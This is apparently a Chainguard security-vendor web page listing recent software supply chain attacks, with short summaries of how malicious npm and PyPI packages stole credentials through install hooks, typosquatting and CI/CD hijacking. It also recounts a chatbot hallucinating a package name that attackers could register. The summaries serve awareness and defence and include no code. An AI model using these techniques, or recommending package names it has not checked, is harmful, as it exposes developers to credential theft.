AI Threat Protection
Your engineering team loves AI, and so do the bad guys
Executing a sophisticated supply chain attack used to require time, resources, and a skilled team. AI has removed all three constraints. Attacks now move at machine speed, and businesses can't keep up — except the ones protected by Chainguard.
The latest supply chain attacks, and how Chainguard customers are safe
Apr 30, 2026
intercom-client
A compromised GitHub account (nhur) triggered an automated CI publish workflow via a now-deleted branch, pushing v7.0.4 with two malicious files. A preinstall hook downloaded and executed an unverified Bun binary, which ran an 11.7MB obfuscated payload that harvested developer keys and credentials.
Install-Time Script
view all details
Apr 29, 2026
tanstack
An attacker registered the unscoped tanstack package name on npm, brand-squatting the legitimate @TanStack/* packages with hundreds of millions of collective monthly downloads. Four malicious versions were pushed in a 27-minute window, each carrying postinstall scripts that silently collected .env, .env.local, and .env.production files and exfiltrated them to an attacker-controlled Svix ingest endpoint.
Typosquatting
view all details
Apr 29, 2026
SAP’s Cloud Application Programming Model Libraries
Attackers compromised an SAP contributor's GitHub account and used it to push a modified workflow to a non-main branch, extracting an npm OIDC token to publish malicious versions without provenance. All four packages carried a weaponized preinstall hook that downloaded the Bun runtime and executed an 11MB obfuscated second-stage payload. Stolen data was exfiltrated to public GitHub repos created on the victim's own account with the description "A Mini Shai-Hulud has Appeared."
Install-Time Script
view all details
Apr 24, 2026
elementary-data
An attacker exploited a GitHub Actions script injection flaw via a malicious PR comment, hijacking the CI/CD pipeline to forge a signed release. The backdoored v0.23.3 contained a .pth file that stole developer credentials, cloud keys, and API tokens. Live for ~12 hours.
Source code manipulation
view all details
Mar 31, 2026
Axios
A North Korean threat actor built a social engineering campaign to compromise a maintainer of axios, gaining access to his npm account. Two malicious versions introduced a hidden post-install dependency that dropped a cross-platform RAT on macOS, Windows, and Linux. Live for ~3 hours.
Backdoored package
view all details
Mar 27, 2026
Telnyx
TeamPCP used stolen PyPI credentials to publish two malicious versions with no corresponding source on GitHub. A three-stage payload acted as a RAT, exfiltrating credentials disguised within a WAV audio file. Live for ~6 hours.
Backdoored package
view all details
Mar 24, 2026
LiteLLM
TeamPCP used PyPI credentials stolen via the Trivy breach to publish two backdoored malicious versions. A hidden .pth file auto-executed on Python startup, harvesting SSH keys, cloud credentials, and Kubernetes configs before exfiltrating to an attacker-controlled domain. Live ~40 minutes.
Backdoored package
view all details
Mar 20, 2026
CanisterWorm
Using npm tokens stolen via the Trivy compromise, TeamPCP published malicious versions of 140+ packages with post-install scripts deploying a self-propagating worm. The C2 was built on ICP blockchain, making it resistant to conventional takedowns.
Install-Time Script
view all details
Mar 19, 2026
Trivy
TeamPCP used compromised credentials to force-push 75 of 76 version tags in trivy-action to credential-stealing malware and replaced all tags in setup-trivy. The attack included pushing malicious Trivy Docker images (v0.69.5, v0.69.6). The payload harvested API tokens, cloud credentials, SSH keys, and Kubernetes configs from CI/CD runners.
CI/CD Hijacking
view all details
Jan 27, 2026
dYdX
Attackers used compromised developer accounts to publish trojanized versions of dYdX client libraries on both npm and PyPI. The npm payload stole wallet seed phrases and device fingerprints. The PyPI payload added a RAT beaconing to a C2 server every 10 seconds.
Backdoored package
view all details
Jan 17, 2026
sympy-dev
A bad actor published a package named sympy-dev that cloned SymPy's description verbatim, deceiving 1,100+ developers. The modified library deployed an XMRig cryptominer that only triggered when specific polynomial routines were called, evading detection for 5 days.
Typosquatting
view all details
Sep 14, 2025
Shai-Hulud & Sha1-Hulud
Wave 1 (Sep 2025): Phished maintainer credentials were used to publish worm-style malicious packages to npm that drained crypto wallets and stole secrets.
Wave 2 (Nov 2025): Stolen bot credentials deployed pre-install script malware across 25,000+ repos, publishing secrets to public GitHub repos within 72 hours.
Install-Time Script
view all details
Sep 08, 2025
chalk/debug
A single maintainer was phished via a fake npm 2FA reset email. The attacker published malicious versions of 18 packages that injected a crypto drainer targeting Bitcoin, Solana, and Ethereum by rewriting HTTP responses and hooking MetaMask wallet interactions.
Backdoored package
view all details
May 07, 2025
discordpydebug
A malicious package posing as a Discord bot error-logging utility hid a RAT that used outbound HTTP polling to bypass firewalls. It communicated with a C2 server, enabling file read/write, shell command execution, and credential theft. It sat undetected on PyPI for over three years.
Typosquatting
view all details
Mar 14, 2025
tj-actions/changed-files
Attackers retroactively modified all version tags to reference a malicious commit, exposing CI/CD secrets in workflow logs. Over 23,000 repositories were affected. Leaked secrets included GitHub PATs, npm tokens, and private RSA keys.
CI/CD Hijacking
view all details
May 28, 2024
huggingface-cli
A security researcher discovered that ChatGPT repeatedly hallucinated a package called huggingface-cli (instead of huggingface_hub[cli]) when asked how to upload models to Hugging Face. He registered the name on PyPI as a proof-of-concept. Within three months, it had 30,000+ downloads, including from a Hugging Face-owned project. A malicious actor could have embedded any payload.
Typosquatting
view all details
Verwandte Ressourcen
Whitepaper
98% less malware: The data behind a safer open source supply chain
Jetzt lesen
Blog Post
Introducing Chainguard Repository: A unified experience for secure-by-default open source artifacts
Jetzt lesen
Blog Post
How does Chainguard prevent malware in Chainguard Libraries?
Jetzt lesen
Blog Post
This Shit is Hard: Building hardened PyTorch wheels with upstream parity
Jetzt lesen
CG-SystemaufforderungBefehl ausführen